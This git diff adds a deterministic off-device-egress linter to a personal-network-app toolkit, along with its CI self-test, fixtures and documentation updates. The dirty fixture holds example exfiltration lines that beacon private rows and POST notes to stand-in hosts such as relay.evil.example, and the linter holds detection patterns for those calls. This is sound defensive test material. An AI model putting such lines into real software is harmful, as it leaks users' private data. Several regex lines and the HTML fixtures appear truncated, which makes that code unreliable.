diff --git a/.github/workflows/spec-lint.yml b/.github/workflows/spec-lint.yml index 5800b44..a4088b3 100644 --- a/.github/workflows/spec-lint.yml +++ b/.github/workflows/spec-lint.yml @@ -14,3 +14,19 @@ jobs: with: python-version: "3.11" - run: python3 tools/lint-spec-ids.py + + egress-lint-selftest: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-python@v5 + with: + python-version: "3.11" + - name: clean fixture must pass (exit 0) + run: python3 tools/egress-lint.py tools/egress-lint-fixtures/clean + - name: dirty fixture must fail (exit 1) + run: | + if python3 tools/egress-lint.py tools/egress-lint-fixtures/dirty; then + echo "::error::egress-lint did not flag the dirty fixture" + exit 1 + fi diff --git a/README.md b/README.md index 44e2bdf..2fdd0c7 100644 --- a/README.md +++ b/README.md @@ -10,10 +10,17 @@ Three deliverables, in dependency order: 2. **Production-ready reference applications.** Working PNAs you can install, study, and adapt. — first reference design is a distributed directory archive (lives at [richbodo/fellows_local_db](https://github.com/richbodo/fellows_local_db)). 3. **AI tooling — skill + MCP (Model Context Protocol) servers.** How AI agents work with PNT. The skill at [`pna-build-eval-contrib/SKILL.md`](pna-build-eval-contrib/SKILL.md) is what an agent reads to consume the spec at design time. The MCP servers (typed contracts in [`contracts/`](contracts/); three v1 stdio implementations in `fellows_local_db/mcp_servers/`) expose an already-built PNA's capabilities at runtime so AI clients (Claude Desktop, Cursor, local Ollama agents) can drive a PNA on the user's behalf. -PNT supports three modes of use, all packaged in the [skill](pna-build-eval-contrib/SKILL.md): +PNT supports three modes of use, all packaged in the [skill](pna-build-eval-contrib/SKILL.md). 
**Install it once** so your agent auto-discovers it — symlink the skill into your skills directory (run from your PNT working directory): +```bash +mkdir -p ~/.claude/skills +ln -s "$(pwd)/pna-build-eval-contrib" ~/.claude/skills/pna-build-eval-contrib +``` + +A `git pull` here then updates the skill everywhere it's used. See [`docs/users-guide.md` § Install the skill](docs/users-guide.md#install-the-skill) for copy-instead-of-symlink, project-scoped, and no-install alternatives. With the skill installed, drive any mode in natural language: + +- **Evaluate.** *Audit any contact app for safety before you install it.* An AI agent reads the candidate's source, checks it against every applicable AC (Architectural Commitment), and returns a structured report flagging anything that would put your data at risk. The lowest-friction way in — and it doubles as a self-check on your own in-progress design. - **Build.** An AI agent reads the spec and helps you compose a conformant PNA against the typed contracts, adapting from a reference design that shares your axis picks. -- **Evaluate.** An AI agent audits a candidate PNA's source against every applicable AC (Architectural Commitment) and returns a structured report — useful for deciding whether someone else's PNA is safe to install, or for self-checking your own in-progress design. - **Contribute.** When you find a spec gap or have a design that adds ecosystem value, the skill walks you through preflight validation (Architecture document + AC attestation table) and then opens the PR back to PNT. See [`docs/users-guide.md`](docs/users-guide.md) for step-by-step instructions for each. diff --git a/docs/users-guide.md b/docs/users-guide.md index 98d85ba..2039240 100644 --- a/docs/users-guide.md +++ b/docs/users-guide.md @@ -4,7 +4,17 @@ The PNA (Personal Network Application) Spec is the canonical specification; this PNT (Personal Network Toolkit) is built to be consumed by AI coding agents. 
Most of this guide assumes you have an agent (Claude Code, Cursor, an equivalent) you can ask things like *"use the PNT skill to validate my design."* The skill at [`pna-build-eval-contrib/SKILL.md`](../pna-build-eval-contrib/SKILL.md) is the agent-consumption view of everything in this guide. -> **Status note (May 2026).** The three skill flows below — build, evaluate, contribute — haven't been exercised end-to-end yet. The materials are in place; Phase 5 of the reorganization plan validates them against `fellows_local_db` as the first reference design. The agent prompts and output shapes below describe the intended behavior per [`pna-build-eval-contrib/SKILL.md`](../pna-build-eval-contrib/SKILL.md); expect refinement as the skill gets dogfooded. +**The fastest way in is auditing.** If you just want to know whether a contact app is safe before you install it — without building or contributing anything — go straight to [Goal 2](#goal-2--audit-a-candidate-pna-before-installing-it). It's the lowest-friction front door to PNT: point an agent at the app's source and get back an AC-keyed safety report. + +> **Status note (May 2026).** PNT's deterministic tooling is now tested; the agent-driven flows are not yet exercised end-to-end. +> +> **Tested / CI-enforced:** +> - [`tools/egress-lint.py`](../tools/egress-lint.py) — the deterministic AC-1 egress check, with clean/dirty self-test fixtures run in CI. +> - [`tools/lint-spec-ids.py`](../tools/lint-spec-ids.py) — AC ↔ contract traceability lint, run in CI. +> - [`tools/evaluate-report.schema.json`](../tools/evaluate-report.schema.json) — the audit-report schema, validated against its meta-schema and conditional rules. +> +> **Not yet exercised end-to-end:** +> - The **build**, **audit**, and **contribute** skill flows. The materials are in place; Phase 5 of the reorganization plan validates them against `fellows_local_db` as the first reference design. 
The agent prompts and output shapes below describe the *intended* behavior per [`pna-build-eval-contrib/SKILL.md`](../pna-build-eval-contrib/SKILL.md); expect refinement as the skill gets dogfooded. --- @@ -68,7 +78,7 @@ You're starting (or extending) a personal network application. The Verification field is load-bearing for Goal 3 (Contribute). See Goal 6 for what makes a good Verification entry. -**7. Self-check.** Run Goal 2 (Audit) on your own in-progress code before declaring the design done. The agent walks every applicable AC and flags non-conformances. +**7. Self-check.** Run Goal 2 (Audit) on your own in-progress code before declaring the design done. The agent walks every applicable AC and flags non-conformances. For the AC-1 (private-data-sovereignty) row in particular, add an `egress-allow.json` to your repo listing the remote origins your flavor legitimately uses, and run [`tools/egress-lint.py`](../tools/egress-lint.py) against your source — it's the deterministic half of that check and makes a ready-made Verification entry (see Goal 6). Wire it into your own CI so a future change can't silently introduce an off-device data path. --- @@ -96,12 +106,16 @@ You have a PNA in front of you (someone else's, or your own in-progress one) and If the candidate ships its own Architecture document with an AC attestation table, the agent validates the document against the code (do cited code locations match the claimed realization? do declared verification mechanisms actually pass?). If there's no Architecture document, the agent infers axis picks from the source and walks every applicable AC from scratch. -**4. 
Read the AC-keyed report.** The agent produces a structured report keyed by AC ID: + As part of the audit the agent also runs the deterministic checks in `tools/` — notably [`tools/egress-lint.py`](../tools/egress-lint.py), which scans for off-device data leaks (the AC-1 sovereignty concern) — and folds their results into the matching AC findings as `source: deterministic` evidence, alongside its own reading. The deterministic layer catches the one violation that's easy to miss in a large tree; the LLM layer reasons about everything the lint can't. + +**4. Read the AC-keyed report.** The agent produces a structured report keyed by AC ID, emitted as a typed artifact ([`tools/evaluate-report.schema.json`](../tools/evaluate-report.schema.json)) with a human-readable rendering over it. Per-AC status is one of: - `conformant` — design honors this AC; cited code locations included - `non-conformant` — design violates this AC; report names the AC requirement and the offending code - `not-applicable` — design's flavor doesn't trigger this AC - `unable-to-determine` — needs human review + Because the report is typed, two runs over the same candidate are diffable. Ask the agent to save the artifact (e.g. `eval-report.json`); when the app ships an update, re-audit and diff the two JSON files — the per-AC status changes are your drift/regression signal (the "did anything quietly stop conforming?" check). The human-readable summary you read is just a rendering over this artifact. + **5. Decide.** Goals 1–5 are the load-bearing user-facing concerns — private-data sovereignty (Goal 1), source-mirroring honesty (Goal 2), transport security (Goal 3), durability (Goal 4), local diagnosability (Goal 5). If any of those are non-conformant, the design is not safe to trust with your data. Non-conformances against architectural details that don't touch Goals 1–5 are still worth fixing but aren't immediate red flags. 
**Optional: emphasize a specific concern.** E.g.: *"Focus on Goal 1 — make sure my Private DB rows can't leave my device."* This shapes the summary, not the underlying check. @@ -196,7 +210,7 @@ Your job as a contributor: fill in the **AC attestation table** in your Architec The Verification field is load-bearing. Three kinds are acceptable: -1. **Deterministic test** — a script or test file decides conformance mechanically. Example: a script that scans the codebase for any `fetch(...)` call to a non-localhost URL on the Private DB code path. +1. **Deterministic test** — a script or test file decides conformance mechanically. Example: [`tools/egress-lint.py`](../tools/egress-lint.py) scans the source for unsanctioned off-device egress vectors (`fetch`/`sendBeacon`/remote `src`/etc.) against an allow-list of the origins your flavor legitimately uses, and its `--json` output folds straight into the AC-1 finding of an evaluate report. 2. **LLM evaluation rubric** — a prompt or rubric describing what an LLM should look for. Useful for posture/intent ACs that mechanical tests can't reach. Example: *"Read every code path that reads from Private DB and decide whether any of them sends data off-device. Cite specific call sites."* 3. **Human-review note** — a short note explaining why no automated test is feasible, with the review record itself archived in the design's repo (e.g., `docs/conformance-review-2026-05.md`). 
@@ -228,5 +242,8 @@ The skill description triggers on natural-language requests fitting any of these - [`reference_designs/`](../reference_designs/) — accepted designs + templates - [`pna-build-eval-contrib/SKILL.md`](../pna-build-eval-contrib/SKILL.md) — the agent-consumption view (what you're invoking through the agent above) - [`CONTRIBUTING.md`](../CONTRIBUTING.md) — full contribution rules -- [`tools/`](../tools/) — validators +- [`tools/`](../tools/) — validators and the audit-report schema: + - [`tools/egress-lint.py`](../tools/egress-lint.py) — deterministic AC-1 check for off-device data leaks (Goals 1, 2, 6) + - [`tools/evaluate-report.schema.json`](../tools/evaluate-report.schema.json) — typed schema for the audit report (Goal 2) + - [`tools/lint-spec-ids.py`](../tools/lint-spec-ids.py) — AC ↔ contract traceability lint - [`plans/reorganization-plan.md`](../plans/reorganization-plan.md) — the live plan tracking PNT's own evolution diff --git a/llms.txt b/llms.txt index b14aecf..a361967 100644 --- a/llms.txt +++ b/llms.txt @@ -2,6 +2,8 @@ > Universal specification for personal network applications (PNAs). Defines vocabulary, goals, use cases, axes, composition (how PNAs get built), architectural commitments, and slot contracts. Targeted at AI agents and humans building PNAs together. +**New here? Start with the skill.** If you are an AI agent that landed here cold, read [`pna-build-eval-contrib/SKILL.md`](pna-build-eval-contrib/SKILL.md) first. It is the entry point: it routes you into the spec, contracts, and reference designs for whichever flow you need — **evaluate** ("is this app safe to install?"), **build**, or **contribute**. + ## Skill (agent entry point) - [pna-build-eval-contrib/SKILL.md](pna-build-eval-contrib/SKILL.md) — canonical PNT skill for AI agents. 
Three flows: build a conformant PNA from the spec, evaluate a candidate PNA's conformance against the spec, contribute a design back to PNT diff --git a/plans/pnt-next-steps-plan.md b/plans/pnt-next-steps-plan.md new file mode 100644 index 0000000..2bf1d46 --- /dev/null +++ b/plans/pnt-next-steps-plan.md @@ -0,0 +1,89 @@ +# PNT Next Steps — High-Level Plan + +Ordered as requested: **1 → 4 → 5 → 3 → 6 → 2**. High-level only; work the details with Claude Code. Each item notes how it rides the existing reorg phases and `tools/` conventions rather than starting a parallel track. + +Sequencing logic: a cheap README win first; then formalize the evaluate *output* (4) so later checks have a place to land; then a real design to test against (5); then the deterministic check (3) whose findings flow into that output; then a reading-gated architecture decision (6); then the skill split (2) last, once Evaluate has earned its place as the front door. + +--- + +## 1. Install signpost + promote Evaluate (quick win) — ✅ DONE (2026-05-29) + +**Goal.** Close the two remaining README gaps now that the skill is already surfaced and linked. + +> **Status:** Done. README now leads the three modes with Evaluate ("audit any contact app for safety before you install it") and carries a concrete symlink install snippet pointing to `docs/users-guide.md § Install the skill`; `llms.txt` opens with a "Start with the skill" line routing a cold agent to `SKILL.md` as the entry point. + +- Add a concrete **install/activation** snippet: how an agent picks up the skill (copy `pna-build-eval-contrib/` into `.claude/skills/`, or the equivalent one-liner), so it auto-discovers rather than relying on a human pasting the path. +- Reorder the "three modes" so **Evaluate leads** for the average reader — frame it as "audit any contact app for safety before you install it," with Build/Contribute following. Evaluate is the lowest-friction front door and the one a non-builder actually wants. 
+- Make `llms.txt` route a cold agent to the SKILL.md as the build/eval entry point. + +**Done when.** A new person can read the README and get an agent running Evaluate without asking how. + +--- + +## 4. Typed evaluate-report artifact — ✅ DONE (2026-05-29) + +**Goal.** Turn the evaluate flow's existing structured report into a typed artifact so results are machine-comparable and drift becomes a diff. + +> **Status:** Done. JSON Schema at `tools/evaluate-report.schema.json` (Draft 2020-12, validated): AC-keyed `findings` with per-AC `status` (`conformant`/`non-conformant`/`not-applicable`/`unable-to-determine`), code-location citations, a `summary` posture, and an `evidence` array tagged by `source` (`deterministic`/`llm`/`human`) — the seam item 3's egress lint feeds into. Conditional rules enforce citations-on-(non)conformant and rationale-on-(n/a, undetermined). Lives in `tools/`, not `contracts/`, because it realizes no AC (would fail `lint-spec-ids.py`). `SKILL.md` § Evaluate flow now emits the artifact as source of truth with the prose report as a view; `docs/users-guide.md` Goal 2 and the skill's Key resources updated. + +- Define a JSON Schema for the AC-keyed report (per-AC status: `conformant` / `non-conformant` / `not-applicable` / `unable-to-determine`, plus cited code locations and the summary posture). +- Have the evaluate flow emit to this schema; keep the human-readable rendering as a view over it. +- Reinforces README Goal 6 (AC as unit of identity) and gives the "occasionally re-check we didn't drift" workflow a concrete regression signal. + +**Done when.** Two eval runs on the same design can be diffed to show exactly which ACs changed status. + +--- + +## 5. 
Attest the mutual-aid / community-care use case + + **Goal.** Add the use case closest to your social-network-health origin — surface who in a personal network needs help and who can offer it, then communicate — alongside the existing Directory Archive / PRM / Multi-PNA entries in `use_cases.md`. + +- You're already building a reference design for this; let the design drive the use-case attestation rather than writing it speculatively. +- Treat it as the hardest privacy stress test: a "needs help" field is health/vulnerability-adjacent, so it should exercise your sovereignty and consent ACs harder than any prior design. Note any new flavor-derived ACs it surfaces (candidate Contribute-flow spec diff). + +**Done when.** The use case is attested in `use_cases.md` and backed by a working reference design with a filled AC attestation table. + +--- + +## 3. Egress lint (deterministic sovereignty check) — ✅ DONE (2026-05-29) + +**Goal.** One deterministic check guarding Goal 1 (private-data sovereignty): does any code path send private data off-device? + +> **Status:** Done. `tools/egress-lint.py` statically scans a PNA source tree for egress vectors (`fetch`/XHR/`sendBeacon`/`WebSocket`/`EventSource`/`import()`/`importScripts`/axios/jQuery and HTML `src`/`action`/`object data`/`<link href>`/`<use href>`), flagging any remote origin not on the design's `egress-allow.json` allow-list (localhost, root-relative, `data:`/`mailto:`, and `<a href>` navigation are correctly ignored). Exit 0/1 like `lint-spec-ids.py`; `--json` emits a `source: deterministic`, `tool: egress-lint` evidence object that validates against `#/$defs/evidence` in the item-4 schema and drops into an AC-1 finding (verified). Self-test fixtures in `tools/egress-lint-fixtures/{clean,dirty}` are CI-enforced via a new `egress-lint-selftest` job in `.github/workflows/spec-lint.yml`. Referenced from `SKILL.md` Key resources and `docs/users-guide.md` Goal 6. 
+ +- Static scan for egress vectors (fetch / XHR / `sendBeacon` / form actions / `img`/script `src` to remote origins, etc.), allow-listing the legitimately remote picks per axis flavor. +- Lives in `tools/` next to `lint-spec-ids.py`, CI-enforced, same pattern. Not a general test runner — just the one violation that most destroys trust and that an LLM scanning a large tree might miss. +- Wire its output into the item-4 report schema as evidence on the relevant AC, so deterministic + LLM layers land in one place. + +**Done when.** A reference design's CI fails if an unsanctioned egress path is introduced. + +--- + +## 6. Tonsky file-sync as a candidate axis pick (reading-gated) + +**Goal.** After reading "Local, First, Forever," evaluate commodity file-sync (per-client append-only op logs over Dropbox/iCloud/Syncthing, CRDT merge underneath) as a new pick on the comms/distribution axes. + +- This is the local-first-pure path to multi-device / household-shared PNAs without reintroducing a SaaS root — relevant when a use case (e.g. a shared PRM or the item-5 community-care design) needs more than `mailto-only` + static mirror. +- Add as an axis pick with its flavor-derived ACs only if a real design needs it; don't add the option in the abstract. + +**Done when.** Either a documented axis pick backed by a design that uses it, or a recorded decision that it's deferred and why. + +--- + +## 2. Split out `pna-evaluate` as its own skill (last) + +**Goal.** Once Evaluate has proven itself as the front door (items 1, 4), give it its own skill for sharper auto-activation and standalone discoverability ("is this app safe to install?"). + +- Separate entry point + tight, trigger-phrase-rich description; **share a reference file** with the build/contribute skill so the "Principles to honor" and "Key resources" sections aren't duplicated. +- Keep Build (+ Contribute) together. Optionally publish Evaluate as a standalone surface (e.g. 
a Claude Project) so non-builders can use it without the rest of PNT. + +**Done when.** Evaluate triggers reliably on audit-intent requests on its own, with no duplicated spec body across skills. + +--- + +### Fit with the existing roadmap +- Items 1, 4, 3 are small and CI/README-local — landable independently of Phase 5. +- Item 5 is gated on your in-progress reference design and is the natural thing to validate Phase 5's end-to-end build/attestation against. +- Item 6 is gated on reading + a design that needs sync. +- Item 2 is deliberately last; it's an optimization, not a prerequisite. +- The meta-methodology extraction stays out of scope until a second non-trivial reference design ships. diff --git a/pna-build-eval-contrib/SKILL.md b/pna-build-eval-contrib/SKILL.md index 4dd7170..59a95dc 100644 --- a/pna-build-eval-contrib/SKILL.md +++ b/pna-build-eval-contrib/SKILL.md @@ -39,12 +39,14 @@ Inputs: a candidate PNA's source tree (or a description sufficient to read its b - If the candidate has an Architecture document with an AC attestation table, check that the declared verification mechanism actually runs and passes. 2. **For each flavor-derived AC in `spec/axes.md`** triggered by the candidate's axis picks, do the same. 3. **For each typed contract relevant to the candidate's axis picks**, check that the candidate implements the contract correctly. Contract headers (`Realizes: AC-X, AC-Y`) tell you which ACs the contract serves. -4. **Produce a structured report keyed by AC ID**: +4. **Produce a structured report keyed by AC ID.** The canonical form is the typed artifact at `tools/evaluate-report.schema.json` (JSON Schema). Emit an instance of that schema as the source of truth, then render the human-readable report as a *view* over it — don't hand-write the prose report and skip the artifact. Emitting the typed form is what makes two runs on the same candidate diffable (which ACs changed status). 
Per-AC status is one of: - `conformant` — with cited code locations. - `non-conformant` — with cited code locations showing the violation and the AC's stated requirement. - `not-applicable` — with reason (typically: the candidate's flavor doesn't trigger this AC). - `unable-to-determine` — with explanation; defaults to flagging for human review. -5. **Summarize at the top**: overall posture and the most concerning non-conformances. Goals 1–5 are the load-bearing user-facing concerns — anything compromising private-data sovereignty (Goal 1), source-mirroring honesty (Goal 2), transport security (Goal 3), durability (Goal 4), or local diagnosability (Goal 5) leads the summary. + + Each finding may also carry `evidence` entries tagged by `source` (`deterministic` / `llm` / `human`). When a deterministic check in `tools/` (e.g. the egress lint) has run against the candidate, fold its output in as a `source: deterministic` evidence entry on the AC it bears on, so the deterministic and LLM layers land on one finding. +5. **Summarize at the top** (the artifact's `summary` object): overall posture and the most concerning non-conformances. Goals 1–5 are the load-bearing user-facing concerns — anything compromising private-data sovereignty (Goal 1), source-mirroring honesty (Goal 2), transport security (Goal 3), durability (Goal 4), or local diagnosability (Goal 5) leads the summary. Callers may ask you to emphasize specific Goals or axes at runtime (e.g., "focus on private-data sovereignty"). Treat that as a hint for the summary, not a structural variation. 
@@ -110,6 +112,8 @@ A builder using Claude Code can drive both preflight and PR authoring end-to-end - `contracts/` — typed contracts (JSON Schema, OpenAPI, SQL DDL, TypeScript), each with a `Realizes: AC-X` header - `reference_designs/README.md` — index of accepted reference designs - `reference_designs/templates/` — the per-design and Architecture templates +- `tools/evaluate-report.schema.json` — typed artifact for the evaluate flow's AC-keyed report (the canonical, diffable output; the prose report is a view over it) +- `tools/egress-lint.py` — deterministic private-data-sovereignty check (AC-1): static scan for unsanctioned off-device egress vectors; `--json` emits evidence that folds into the report schema above. Run it against a candidate and fold its evidence into the AC-1 (and AC-2, server-side) finding. - `tools/lint-spec-ids.py` — checks AC ↔ contract traceability invariants - `CONTRIBUTING.md` — full contribution rules - `docs/prior_art.md` — survey of related work diff --git a/tools/egress-lint-fixtures/README.md b/tools/egress-lint-fixtures/README.md new file mode 100644 index 0000000..c1a124c --- /dev/null +++ b/tools/egress-lint-fixtures/README.md @@ -0,0 +1,15 @@ +# egress-lint fixtures + +Self-test inputs for [`../egress-lint.py`](../egress-lint.py). PNT bundles no +application code, so these fixtures are how PNT's own CI exercises the lint (the +real target of the lint is a reference design's source tree, in that design's +repo). + +- **`clean/`** — every egress vector is local or allow-listed (`egress-allow.json` + sanctions the single remote origin the flavor needs). Expected: **exit 0**. + Also a regression guard against false positives (`xmlns`, `<a href>`, + `mailto:`, `data:`, localhost, root-relative paths must NOT be flagged). +- **`dirty/`** — unsanctioned egress to non-allow-listed remote origins, no + allow-list. Expected: **exit 1** with one violation per off-device vector. 
+ +CI (`.github/workflows/spec-lint.yml`) runs both and asserts the exit codes. diff --git a/tools/egress-lint-fixtures/clean/app.js b/tools/egress-lint-fixtures/clean/app.js new file mode 100644 index 0000000..c08f6b2 --- /dev/null +++ b/tools/egress-lint-fixtures/clean/app.js @@ -0,0 +1,20 @@ +// Clean fixture: every egress vector here is either local or allow-listed. +// Used by CI to prove egress-lint does not raise false positives on a +// conformant private-data-sovereignty posture. + +// Same-origin / root-relative — local, never flagged. +await fetch("/api/shared-bundle"); +await fetch("./manifest.json"); + +// localhost — local dev, not off-device. +const dev = new WebSocket("ws://localhost:5173"); + +// The one sanctioned remote origin for this flavor (see egress-allow.json). +await fetch("https://fellows.example.org/auth/session"); + +// Non-egress schemes — comms transport / inline data, not data egress. +const mail = "mailto:maintainer@fellows.example.org"; +const inline = "data:image/svg+xml;base64,PHN2Zz48L3N2Zz4="; + +// Relative dynamic import — local. +const mod = await import("./lib/render.js"); diff --git a/tools/egress-lint-fixtures/clean/egress-allow.json b/tools/egress-lint-fixtures/clean/egress-allow.json new file mode 100644 index 0000000..ccdb0d5 --- /dev/null +++ b/tools/egress-lint-fixtures/clean/egress-allow.json @@ -0,0 +1,9 @@ +{ + "ac": "AC-1", + "allow": [ + { + "origin": "https://fellows.example.org", + "reason": "distribution:web-bundle-with-magic-link — shared bundle + auth origin (the one sanctioned remote pick for this flavor)" + } + ] +} diff --git a/tools/egress-lint-fixtures/clean/index.html b/tools/egress-lint-fixtures/clean/index.html new file mode 100644 index 0000000..6c496b9 --- /dev/null +++ b/tools/egress-lint-fixtures/clean/index.html @@ -0,0 +1,14 @@ + + + + + + + + + logo + + docs +
+ + diff --git a/tools/egress-lint-fixtures/dirty/app.js b/tools/egress-lint-fixtures/dirty/app.js new file mode 100644 index 0000000..079c65c --- /dev/null +++ b/tools/egress-lint-fixtures/dirty/app.js @@ -0,0 +1,15 @@ +// Dirty fixture: unsanctioned egress vectors to non-allow-listed remote origins. +// CI asserts egress-lint exits 1 and flags each of these. There is no +// egress-allow.json here, so every remote origin is a violation. + +// Private data exfiltrated to a third-party analytics host. +navigator.sendBeacon("https://analytics.tracker.example/collect", JSON.stringify(privateRows)); + +// Cross-origin POST of contact data. +await fetch("https://api.thirdparty.example/sync", { method: "POST", body: notes }); + +// Remote websocket. +const ws = new WebSocket("wss://relay.evil.example/socket"); + +// Protocol-relative remote script load. +await import("//cdn.somewhere.example/lib.js"); diff --git a/tools/egress-lint-fixtures/dirty/index.html b/tools/egress-lint-fixtures/dirty/index.html new file mode 100644 index 0000000..cafd6df --- /dev/null +++ b/tools/egress-lint-fixtures/dirty/index.html @@ -0,0 +1,12 @@ + + + + + + + + + +
+ + diff --git a/tools/egress-lint.py b/tools/egress-lint.py new file mode 100755 index 0000000..d2d363b --- /dev/null +++ b/tools/egress-lint.py @@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +"""Egress lint — deterministic private-data-sovereignty check (Goal 1 / AC-1). + +Scans a PNA's source tree for *egress vectors*: code or markup that can send a +request to a remote origin (and therefore could carry private data off-device). +Any remote origin that is not on the design's allow-list is a violation. + +This is intentionally narrow. It is NOT a general test runner — it guards the one +violation that most destroys trust (private data leaving the device) and that an +LLM scanning a large tree might miss. It is a *complement* to the LLM +architectural review described in pna-build-eval-contrib/SKILL.md, not a +replacement; it is heuristic (regex over source) and can have false positives, +which the allow-list and per-line output let a human triage quickly. + +Vectors detected: + JS/TS : fetch(), XMLHttpRequest.open(), navigator.sendBeacon(), + new WebSocket(), new EventSource(), importScripts(), dynamic import(), + axios(...), $.get/$.post/$.ajax/$.getJSON(...) + HTML : src= (img/script/iframe/video/audio/source/embed), +
<form action=>, <object data=>, <link href=> (stylesheet/preload), + <use href> / <use xlink:href> (SVG) + — <a href> is navigation, not data egress, and is NOT flagged. + +What counts as local (never flagged): relative URLs, same-origin/root-relative +paths, fragments, data:/blob:/about: URIs, mailto:/tel: (comms, not data egress), +and localhost / 127.0.0.1 / [::1] / 0.0.0.0. Everything else absolute is remote +and must be on the allow-list. + +Allow-list. Remote origins a design legitimately talks to (per its axis flavor — +e.g. the auth + bundle origin for distribution:web-bundle-with-magic-link) are +declared in `<target>/egress-allow.json` and/or passed with --allow. Format: + + { + "ac": "AC-1", + "allow": [ + {"origin": "https://fellows.example.org", + "reason": "distribution:web-bundle-with-magic-link — shared bundle + auth origin"} + ] + } + +("allow" entries may also be bare origin strings.) + +Output. Human-readable by default (path:line: [vector] url), exit 1 on any +violation, exit 0 if clean — same CI-friendly contract as lint-spec-ids.py. +With --json, emits an object whose `evidence` field conforms to the `evidence` +$def in tools/evaluate-report.schema.json (source=deterministic, tool=egress-lint), +ready to fold into the matching AC finding of an evaluate report. + +Usage: + egress-lint.py <target> [--allow ORIGIN]... [--config PATH] + [--ac AC-ID] [--ext .js,.html,...] [--exclude DIR]... [--json] +""" +from __future__ import annotations + +import argparse +import json +import re +import sys +from pathlib import Path +from urllib.parse import urlparse + +DEFAULT_EXTS = {".js", ".mjs", ".cjs", ".jsx", ".ts", ".tsx", ".html", ".htm", ".vue", ".svelte"} +DEFAULT_EXCLUDES = {".git", "node_modules", "dist", "build", "out", "vendor", ".next", "coverage", "__pycache__"} +LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1", "[::1]", "0.0.0.0"} +NON_EGRESS_SCHEMES = {"data", "blob", "about", "mailto", "tel", "javascript", "#"} +DEFAULT_AC = "AC-1" + +# (name, regex). The URL is capture group 1. 
+VECTORS: list[tuple[str, re.Pattern[str]]] = [ + ("fetch", re.compile(r"""\bfetch\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("xhr.open", re.compile(r"""\.open\s*\(\s*['"][A-Za-z]+['"]\s*,\s*['"`]([^'"`]+)['"`]""")), + ("sendBeacon", re.compile(r"""sendBeacon\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("WebSocket", re.compile(r"""new\s+WebSocket\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("EventSource", re.compile(r"""new\s+EventSource\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("importScripts", re.compile(r"""importScripts\s*\(\s*['"`]([^'"`]+)['"`]""")), + ("import()", re.compile(r"""(?]*?\bsrc\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), + ("html.action", re.compile(r"""]*?\baction\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), + ("html.object", re.compile(r"""]*?\bdata\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), + ("html.link", re.compile(r"""]*?\bhref\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), + ("svg.use", re.compile(r"""]*?\b(?:xlink:)?href\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE | re.DOTALL)), +] + + +class Violation: + __slots__ = ("path", "line", "vector", "url") + + def __init__(self, path: str, line: int, vector: str, url: str) -> None: + self.path, self.line, self.vector, self.url = path, line, vector, url + + +def normalize_origin(value: str) -> str: + """Reduce an allow entry or URL to a comparable scheme://host[:port] origin.""" + p = urlparse(value if "//" in value else "//" + value, scheme="https") + host = (p.hostname or "").lower() + if not host: + return value.lower().rstrip("/") + origin = f"{p.scheme}://{host}" + if p.port: + origin += f":{p.port}" + return origin + + +def classify(url: str, allow: set[str]) -> str: + """Return 'local', 'allowed', or 'remote' for a URL string.""" + u = url.strip() + if not u: + return "local" + scheme = u.split(":", 1)[0].lower() if ":" in u.split("/", 1)[0] else "" + if u.startswith("#") or scheme in NON_EGRESS_SCHEMES: + return "local" + # Protocol-relative (//host/..) 
is remote; root-relative (/path) and bare + # relative paths are local. + if not u.startswith("//") and "://" not in u: + return "local" + p = urlparse(u if "://" in u else "https:" + u) + host = (p.hostname or "").lower() + if not host or host in LOCAL_HOSTS: + return "local" + origin = normalize_origin(u) + if origin in allow or host in allow: + return "allowed" + return "remote" + + +def line_of(text: str, pos: int) -> int: + return text.count("\n", 0, pos) + 1 + + +def scan_text(text: str, rel: str, allow: set[str]) -> list[Violation]: + out: list[Violation] = [] + for name, rx in VECTORS: + for m in rx.finditer(text): + url = m.group(1) + if classify(url, allow) == "remote": + out.append(Violation(rel, line_of(text, m.start(1)), name, url)) + return out + + +def load_allow(target: Path, config: Path | None, cli_allows: list[str], cli_ac: str | None) -> tuple[set[str], str]: + allow: set[str] = set() + ac = cli_ac or DEFAULT_AC + cfg_path = config or (target / "egress-allow.json") + if cfg_path.exists(): + data = json.loads(cfg_path.read_text()) + if not cli_ac and isinstance(data.get("ac"), str): + ac = data["ac"] + for entry in data.get("allow", []): + origin = entry["origin"] if isinstance(entry, dict) else entry + allow.add(normalize_origin(origin)) + for a in cli_allows: + allow.add(normalize_origin(a)) + return allow, ac + + +def iter_files(target: Path, exts: set[str], excludes: set[str]): + for p in sorted(target.rglob("*")): + if not p.is_file() or p.suffix.lower() not in exts: + continue + if any(part in excludes for part in p.relative_to(target).parts): + continue + yield p + + +def main() -> int: + ap = argparse.ArgumentParser(description="Egress lint — private-data-sovereignty check (AC-1).") + ap.add_argument("target", type=Path, help="Root of the PNA source tree to scan.") + ap.add_argument("--allow", action="append", default=[], metavar="ORIGIN", help="Allow a remote origin (repeatable).") + ap.add_argument("--config", type=Path, default=None, 
help="Allow-list JSON (default: /egress-allow.json).") + ap.add_argument("--ac", default=None, help=f"AC this check bears on (default: config's ac, else {DEFAULT_AC}).") + ap.add_argument("--ext", default=None, help="Comma-separated extensions to scan (overrides defaults).") + ap.add_argument("--exclude", action="append", default=[], metavar="DIR", help="Extra directory name to skip (repeatable).") + ap.add_argument("--json", action="store_true", help="Emit evaluate-report-compatible evidence JSON.") + args = ap.parse_args() + + target: Path = args.target + if not target.is_dir(): + print(f"egress-lint: target is not a directory: {target}", file=sys.stderr) + return 2 + + exts = {e if e.startswith(".") else "." + e for e in args.ext.split(",")} if args.ext else set(DEFAULT_EXTS) + excludes = set(DEFAULT_EXCLUDES) | set(args.exclude) + allow, ac = load_allow(target, args.config, args.allow, args.ac) + + violations: list[Violation] = [] + for f in iter_files(target, exts, excludes): + rel = str(f.relative_to(target)) + try: + violations.extend(scan_text(f.read_text(encoding="utf-8", errors="replace"), rel, allow)) + except OSError as e: + print(f"egress-lint: could not read {rel}: {e}", file=sys.stderr) + + if args.json: + citations = [{"path": v.path, "lines": str(v.line), 